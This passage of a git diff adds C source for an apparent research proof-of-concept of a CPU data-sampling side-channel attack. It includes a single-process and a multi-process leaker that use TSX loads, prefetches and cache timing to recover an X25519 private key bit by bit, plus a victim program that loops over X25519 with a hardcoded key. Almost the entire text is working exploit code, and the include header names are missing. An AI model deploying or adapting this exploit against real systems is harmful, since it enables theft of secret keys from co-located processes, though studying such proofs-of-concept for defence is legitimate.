client_privkey[32]; + printf("Input client private key:\n"); + for (int i = 0; i < 32; i++) { + unsigned int n; + if (scanf("%x", &n) != 1) errx(1, "invalid client private key"); + client_privkey[i] = n; + } + X25519_public_from_private(pubkey, client_privkey); + for (int i = 0; i < 32; i++) { + printf("%02x ", client_privkey[i]); + } + printf("\n"); + for (int i = 0; i < 32; i++) { + printf("%02x ", pubkey[i]); + } + printf("\n"); + uint8_t privkey[32] = {0}; + privkey[31] &= 127; + privkey[31] |= 64; + uint8_t out[40]; + // The algorithm starts at that iteration. + int start_iteration = 253; + + // Check if checkpoint available. + FILE* f = fopen("/tmp/checkpoint", "r"); + if (!f) { + printf("Starting from scratch.\n"); + } + else { + printf("Starting from checkpoint.\n"); + if (fscanf(f, "%d", &start_iteration) != 1 || start_iteration < 0 || start_iteration > 253) errx(1, "corrupt /tmp/checkpoint"); /* a larger value would make set_bit write outside privkey[32] */ + for (int i = 0; i < 32; i++) { + unsigned int n; + if (fscanf(f, "%x", &n) != 1) errx(1, "corrupt /tmp/checkpoint"); + privkey[i] = n; + } + fclose(f); + } + + print_secret(privkey); + +#define MARGIN 3 + + // Ending on iteration 3, since bits 2, 1 and 0 are unset. + for (int iteration = start_iteration; iteration >= 3; iteration--) { + unsigned short results[4][5] = {0}; + size_t poss[4][5] = {0}; + + // iteration - 2 if you want to look at two bits. + // iteration - 1 if you want to look at one bit. 
+ int x_it = iteration - 1; + if (x_it < 0) x_it = 0; + + for (int which_qword = 0; which_qword < 5; which_qword++) { + set_bit(privkey, iteration, 0); + set_bit(privkey, iteration-1, 0); + X25519_fake(out, privkey, pubkey, x_it); + memcpy(&poss[0][which_qword], out + which_qword * sizeof(size_t), sizeof(size_t)); /* memcpy avoids reading the byte buffer through a size_t lvalue */ + + set_bit(privkey, iteration, 0); + set_bit(privkey, iteration-1, 1); + X25519_fake(out, privkey, pubkey, x_it); + memcpy(&poss[1][which_qword], out + which_qword * sizeof(size_t), sizeof(size_t)); + + set_bit(privkey, iteration, 1); + set_bit(privkey, iteration-1, 0); + X25519_fake(out, privkey, pubkey, x_it); + memcpy(&poss[2][which_qword], out + which_qword * sizeof(size_t), sizeof(size_t)); + + set_bit(privkey, iteration, 1); + set_bit(privkey, iteration-1, 1); + X25519_fake(out, privkey, pubkey, x_it); + memcpy(&poss[3][which_qword], out + which_qword * sizeof(size_t), sizeof(size_t)); + } + + printf("iter=%d\nTargets:\n", iteration); + for (int i = 0; i < 5; i++) { + for (int j = 0; j < 4; j++) { + printf("%016zx ", poss[j][i]); + } + printf("\n"); + } + int diff_abs; + int bit; + do { + for (int times = 0; times < 20000; times++) { + for (int k = 0; k < 4; k++) { + for (int wq = 0; wq < 5; wq++) { + int byte = mlpds(poss[k][wq]); + if (byte != -1) { + // Oddly enough, this printf is sometimes necessary... Otherwise exploit + // occasionally breaks. 
+ //printf("res: %d\n", byte); + results[k][wq]++; + } + } + } + } + //diff = 0; + //int plus = 0; + //int minus = 0; + int sums[4] = {0}; + for (int wq = 0; wq < 5; wq++) { + for (int ij = 0; ij < 4; ij++) { + sums[ij] += results[ij][wq]; + } + //diff += results[0][wq] + results[1][wq] - results[2][wq] - results[3][wq]; + //plus += results[0][wq] + results[1][wq]; + //minus += results[2][wq] + results[3][wq]; + printf("%d %d | %d %d\n", results[0][wq], results[1][wq], results[2][wq], results[3][wq]); + } + +#if 1 + //version for iteration - 1 + int x0 = sums[0] + sums[1]; + int x1 = sums[2] + sums[3]; + diff_abs = x0 - x1; + if (diff_abs < 0) diff_abs = -diff_abs; + bit = x1 > x0; + printf("--- diff_abs %d (%d vs. 
%d, total %d)\n", diff_abs, x0, x1, x0+x1); +#else + //version for iteration - 2 + int top = -1, topind = -1, top2 = -1, top2ind = -1; + for (int ij = 0; ij < 4; ij++) { + if (sums[ij] > top) { + top2 = top; + top2ind = topind; + top = sums[ij]; + topind = ij; + } + else if (sums[ij] > top2) { + top2 = sums[ij]; + top2ind = ij; + } + } + diff_abs = top - top2; + bit = topind >= 2; + printf("--- diff_abs %d (top1 %d vs. top2 %d vs. total %d)\n", diff_abs, top, top2, sums[0]+sums[1]+sums[2]+sums[3]); +#endif + } while (diff_abs < MARGIN); + set_bit(privkey, iteration-1, 0); + set_bit(privkey, iteration, bit); + /* + if (diff < 0) { + set_bit(privkey, iteration, 1); + } + else { + set_bit(privkey, iteration, 0); + } + */ + print_secret(privkey); + } + privkey[0] &= 248; + print_secret(privkey); +} + /* run: maps the probe pages, then runs stage3 with zero for both of its unused arguments. */ +void run() { + map(); + + stage3(0, 0); +} + /* main: entry point; calls run() and returns 0. */ +int main() { + run(); + + return 0; +} + diff --git a/pocs/cpus/mds-x25519/leak_multiprocess.c b/pocs/cpus/mds-x25519/leak_multiprocess.c new file mode 100644 index 00000000..a216ea3c --- /dev/null +++ b/pocs/cpus/mds-x25519/leak_multiprocess.c @@ -0,0 +1,368 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + /* NOTE(review): the header names after each #include above were lost in extraction; restore them from the upstream file. */ + + + +#define MEMSZ (256*512 * 100) + +#define CACHE_MISS 100 + /* is_cached: fences, then times a single load from ptr1 between RDTSC and RDTSCP; returns nonzero when the low 32 bits of the cycle delta are below CACHE_MISS. 
*/ +static inline __attribute__((always_inline)) int is_cached(void *ptr1) { + uint32_t diff; + asm volatile ( + //"cpuid\n\t" + "mfence\n\t" + "lfence\n\t" + "RDTSC\n\t" + "mov rbx, rax\n\t" + "mov rdx, [%1]\n\t" + "RDTSCP\n\t" + "lfence\n\t" + "sub rax, rbx\n\t" + "mov %0, eax\n\t" + + : "=b" (diff) + : "S"(ptr1) + : "rax", "rcx", "rdx"); + + return diff < CACHE_MISS; +} + +const unsigned long probe1_addr = 0x7895e4000; +char *probe1 = (char*) probe1_addr; +const unsigned long probe3_addr = 0x560000000; +char *probe3 = (char*) probe3_addr; + + /* mlpds: XORs prefix with probe1_addr, flushes probe1, then runs 32 rounds of a TSX block that loads from address -1, XORs the loaded value with the prepared prefix and prefetches the result; returns 0 when probe1 is cached afterwards (is_cached) and -1 otherwise. */ +static int mlpds(unsigned long prefix) { + prefix ^= probe1_addr; + _mm_clflush(probe1); + 
_mm_mfence(); + _mm_sfence(); + _mm_lfence(); + asm volatile("CPUID"::: "eax","ebx","ecx","edx", "memory"); + + + // TODO find optimal number of iterations. + for (int i = 0; i < 32; i++) { + asm volatile( + ".align 64\n\t" + "0:\n\t" + "clflush [%0]\n\t" + "sfence\n\t" + // idk why, helps speed up + "xbegin 2f\n\t" + + //xbegin block: + "mov rax, [-1]\n\t" + "xor rax, %1\n\t" + "prefetchnta [rax]\n" + + "xend\n\t" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "nop\nnop\nnop\nnop\nnop\n" + "3: jmp 3b\n" + "2:\n\t" + //"dec r15\n\t" + //"jne 0b\n\t" + : + : "r" (probe3), "r"(prefix) + : "rax"); + } + + int p1 = is_cached(probe1); + if (p1) { return 0; } + return -1; +} + + /* map: maps one 4096-byte anonymous page at each fixed probe address (probe1, probe3), fills both with 0x99, and exits via err() when either mmap does not return the requested address. */ +void map() { + if (mmap(probe1, 4096, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0) != probe1) { + err(1, "mmap(probe1)"); + } + memset(probe1, 0x99, 4096); + if (mmap(probe3, 4096, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0) != probe3) { + err(1, "mmap(probe3)"); + } + memset(probe3, 0x99, 4096); +} + /* print_secret: prints the 32 bytes at secret as space-separated two-digit hex values after the label Secret: and ends the line. 
*/ +void print_secret(unsigned char* secret) { + printf("Secret:"); + for (int i = 0; i < 32; i++) { + printf(" %02x", secret[i]); + } + printf("\n"); +} + /* set_bit: sets bit number bit of privkey (bit 0 is the least significant bit of privkey[0]) to the value to; a negative bit index is ignored. Callers in this file pass 0 or 1 for to. */ +void set_bit(uint8_t* privkey, int bit, int to) { + if (bit < 0) return; + privkey[bit / 8] &= ~(1 << (bit & 7)); + privkey[bit / 8] |= to << (bit & 7); +} + +int X25519_fake(uint8_t* out, const uint8_t* privkey, + const uint8_t* peer_pubkey, int iteration); + +void 
X25519_public_from_private(uint8_t out_public_value[32], + const uint8_t private_key[32]); + +#define MARGIN 3 +#define CPU_NUM 6 + +size_t poss[4][5]; + /* do_kill: sends SIGKILL to pid and reaps it with waitpid. */ +void do_kill(int pid) { + kill(pid, SIGKILL); + waitpid(pid, NULL, 0); +} + /* run_child: child-process loop; maps the probe pages, then forever probes every poss[k][wq] with mlpds and, on each hit, increments the unsigned short counter at index k * 5 + wq in shmem and prints a line. Never returns. */ +void run_child(void* shmem) { + map(); + unsigned short* results = (unsigned short*) shmem; + while (1) { + for (int k = 0; k < 4; k++) { + for (int wq = 0; wq < 5; wq++) { + int byte = mlpds(poss[k][wq]); + if (byte != -1) { + results[k * 5 + wq]++; + printf("[pid %d] res: %d for [%d][%d]\n", getpid(), byte, k, wq); + } + } + } + } +} + /* fork_children: forks one child per CPU index below CPU_NUM, pins each to its index with sched_setaffinity, and records pid and index in pids and affin; a child whose affinity call fails with EINVAL is killed and skipped, any other failure exits via err(). Returns the number of children kept. 
*/ +int fork_children(int* pids, int* affin, void* shmem) { + int count = 0; + for (int i = 0; i < CPU_NUM; i++) { + int pid = fork(); + if (pid == -1) { + err(1, "could not fork"); + } + if (pid == 0) { + run_child(shmem); + } + pids[count] = pid; + affin[count] = i; + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(i, &set); + int error = sched_setaffinity(pid, sizeof(set), &set); + if (error) { + if (errno == EINVAL) { + do_kill(pid); + printf("Affinity %d does not work, killing temporary process.\n", i); + } + else { + printf("err %d\n", error); + err(1, "sched_setaffinity"); + } + } + else { + printf("Created new child, pid = %d, affinity = core %d\n", pid, i); + count++; + } + } + return count; +} + /* affinity_valid: returns nonzero when the affinity mask of pid holds exactly one CPU and that CPU is aff; exits via err() when the mask cannot be read. */ +int affinity_valid(int pid, int aff) { + cpu_set_t set; + if (sched_getaffinity(pid, sizeof(set), &set) < 0) { + err(1, "sched_getaffinity"); + } + return CPU_COUNT(&set) == 1 && CPU_ISSET(aff, &set); +} + /* do_iteration: decides bit number iteration of privkey. Fills the global poss with the X25519_fake outputs for the four settings of bits iteration and iteration-1, lets forked children count mlpds hits into a shared page, and loops until the hit totals for bit cleared and bit set differ by at least MARGIN; then kills the children, releases the page and stores the bit. */ +void do_iteration(int iteration, uint8_t* privkey, uint8_t* pubkey) { + uint8_t out[40]; + unsigned short results[4][5] = {0}; + + // iteration - 2 if you want to look at two bits. + // iteration - 1 if you want to look at one bit. 
+ int x_it = iteration - 1; + if (x_it < 0) x_it = 0; + + for (int which_qword = 0; which_qword < 5; which_qword++) { + set_bit(privkey, iteration, 0); + set_bit(privkey, iteration-1, 0); + X25519_fake(out, privkey, pubkey, x_it); + memcpy(&poss[0][which_qword], out + which_qword * sizeof(size_t), sizeof(size_t)); /* memcpy avoids reading the byte buffer through a size_t lvalue */ + + set_bit(privkey, iteration, 0); + set_bit(privkey, iteration-1, 1); + X25519_fake(out, privkey, pubkey, x_it); + memcpy(&poss[1][which_qword], out + which_qword * sizeof(size_t), sizeof(size_t)); + + set_bit(privkey, iteration, 1); + set_bit(privkey, iteration-1, 0); + X25519_fake(out, privkey, pubkey, x_it); + memcpy(&poss[2][which_qword], out + which_qword * sizeof(size_t), sizeof(size_t)); + + set_bit(privkey, iteration, 1); + set_bit(privkey, iteration-1, 1); + X25519_fake(out, privkey, pubkey, x_it); + memcpy(&poss[3][which_qword], out + which_qword * sizeof(size_t), sizeof(size_t)); + } + + printf("iter=%d\nTargets:\n", iteration); + for (int i = 0; i < 5; i++) { + for (int j = 0; j < 4; j++) { + printf("%016zx ", poss[j][i]); + } + printf("\n"); + } + int diff_abs = 0; + int bit = 0; + int num_children = 0; + int pids[1024]; + int affin[1024]; + void* shmem = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0); + if (shmem == MAP_FAILED) { + err(1, "shared memory alloc failed"); + } + + do { + if (num_children == 0) { + num_children = fork_children(pids, affin, shmem); + memset(shmem, 0, sizeof(results)); + usleep(100 * 1000); + } + memset(shmem, 0, sizeof(results)); + usleep(100 * 1000); + unsigned short results_temp[4][5] = {0}; + memcpy(results_temp, shmem, sizeof(results_temp)); + memset(shmem, 0, sizeof(results)); + int all_good = 1; + for (int i = 0; i < num_children; i++) { + all_good &= affinity_valid(pids[i], affin[i]); + } + if (all_good) { + for (int wq = 0; wq < 5; wq++) { + for (int ij = 0; ij < 4; ij++) { + results[ij][wq] += 
results_temp[ij][wq]; + } + } + + int sums[4] = {0}; + for (int wq = 0; wq < 5; wq++) { + for (int ij = 0; ij < 4; ij++) { + sums[ij] += results[ij][wq]; + } + printf("%d %d | %d %d\n", 
results[0][wq], results[1][wq], results[2][wq], results[3][wq]); + } + + int x0 = sums[0] + sums[1]; + int x1 = sums[2] + sums[3]; + diff_abs = x0 - x1; + if (diff_abs < 0) diff_abs = -diff_abs; + bit = x1 > x0; + printf("--- diff_abs %d (%d vs. %d, total %d)\n", diff_abs, x0, x1, x0+x1); + } + else { + printf("Killing children - affinity changed.\n"); + for (int i = 0; i < num_children; i++) { + do_kill(pids[i]); + } + num_children = 0; + } + } while (diff_abs < MARGIN); + printf("Killing children as we leaked the bit.\n"); + for (int i = 0; i < num_children; i++) { + do_kill(pids[i]); + } + munmap(shmem, 4096); /* release the per-iteration shared page */ + set_bit(privkey, iteration-1, 0); + set_bit(privkey, iteration, bit); + print_secret(privkey); +} + /* stage3: reads the 32-byte client private key as hex from stdin, derives its public key, optionally resumes from /tmp/checkpoint, then calls do_iteration for every bit from start_iteration down to 3 and finally clears the low three bits of privkey[0]. Both parameters are unused. Exits via errx() on malformed stdin or checkpoint data. */ +void stage3(size_t secret_offset, size_t saved_rbp) { + uint8_t pubkey[32]; + uint8_t client_privkey[32]; + printf("Input client private key:\n"); + for (int i = 0; i < 32; i++) { + unsigned int n; + if (scanf("%x", &n) != 1) errx(1, "invalid client private key"); + client_privkey[i] = n; + } + X25519_public_from_private(pubkey, client_privkey); + uint8_t privkey[32] = {0}; + privkey[31] &= 127; + privkey[31] |= 64; + // The algorithm starts at that iteration. + int start_iteration = 253; + + // Check if checkpoint available. 
+ FILE* f = fopen("/tmp/checkpoint", "r"); + if (!f) { + printf("Starting from scratch.\n"); + } + else { + printf("Starting from checkpoint.\n"); + if (fscanf(f, "%d", &start_iteration) != 1 || start_iteration < 0 || start_iteration > 253) errx(1, "corrupt /tmp/checkpoint"); /* a larger value would make set_bit write outside privkey[32] */ + for (int i = 0; i < 32; i++) { + unsigned int n; + if (fscanf(f, "%x", &n) != 1) errx(1, "corrupt /tmp/checkpoint"); + privkey[i] = n; + } + fclose(f); + } + + print_secret(privkey); + + // Ending on iteration 3, since bits 2, 1 and 0 are unset. 
+ for (int iteration = start_iteration; iteration >= 3; iteration--) { + do_iteration(iteration, privkey, pubkey); + } + privkey[0] &= 248; + print_secret(privkey); +} + /* run: runs stage3 with zero for both of its unused arguments; the probe pages are mapped inside each child by run_child. */ +void run() { + stage3(0, 0); +} + /* main: entry point; calls run() and returns 0. */ +int main() { + run(); + + return 0; +} + diff --git a/pocs/cpus/mds-x25519/x25519_victim.c b/pocs/cpus/mds-x25519/x25519_victim.c new file mode 100644 index 00000000..30de7045 --- /dev/null +++ b/pocs/cpus/mds-x25519/x25519_victim.c @@ -0,0 +1,24 @@ +#include +#include + +int X25519(uint8_t out_shared_key[32], + const uint8_t private_key[32], + const uint8_t peer_public_value[32]); +void X25519_public_from_private(uint8_t out_public_value[32], + const uint8_t private_key[32]); + /* main: prints the public key derived from clientpriv as hex, then calls X25519(out, priv, pub) with the hardcoded private key in an endless loop; never returns. */ +int main() { + const uint8_t* priv = (const uint8_t*)"privtest12345678somemorebitsABCD"; + uint8_t clientpriv[32] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, + 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32}; + uint8_t pub[32]; + X25519_public_from_private(pub, clientpriv); + for (int i = 0; i < 32; i++) { + printf("%02x ", pub[i]); + } + printf("\n"); + uint8_t out[32]; + while (1) { + X25519(out, priv, pub); + } +}